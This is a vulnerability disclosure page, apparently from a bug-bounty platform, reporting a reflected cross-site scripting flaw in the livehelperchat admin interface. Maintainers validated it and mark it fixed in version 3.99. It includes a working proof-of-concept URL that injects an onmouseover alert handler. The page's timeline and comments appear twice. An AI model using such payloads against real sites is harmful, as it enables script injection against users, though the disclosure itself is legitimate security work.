Cross-site Scripting (XSS) in livehelperchat/livehelperchat

Valid

Reported on

Apr 26th 2022

Proof of Concept

1) Login to the webapplication 
2) Navigate to the below URL
URL :- https://demo.livehelperchat.com/site_admin/system/languages/(updated)/true/(sa)/HEXX%22%3E%3Ca%20onmouseover=alert(11122)%3EDEXX%3Ca

Below some image POC

BurpSuite Request XSS Trigger in Browser

Impact

Attacker can execute malicious JS on Application :)

We are processing your report and will contact the livehelperchat team within 24 hours. a year ago

Remigijus Kiminas validated this vulnerability a year ago

AggressiveUser has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Remigijus Kiminas marked this as fixed in 3.99v with commit edef7a a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

AggressiveUser

commented a year ago

Researcher

@maintainer can i have CVE for this report ? if its possible please mention the @admin for it.

Jamie Slome

commented a year ago

Admin

Sorted 👍 The CVE should be published shortly...

to join this conversation

We are processing your report and will contact the livehelperchat team within 24 hours. a year ago

Remigijus Kiminas validated this vulnerability a year ago

AggressiveUser has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Remigijus Kiminas marked this as fixed in 3.99v with commit edef7a a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

AggressiveUser

commented a year ago

Researcher

@maintainer can i have CVE for this report ? if its possible please mention the @admin for it.

Jamie Slome

commented a year ago

Admin

Sorted 👍 The CVE should be published shortly...

to join this conversation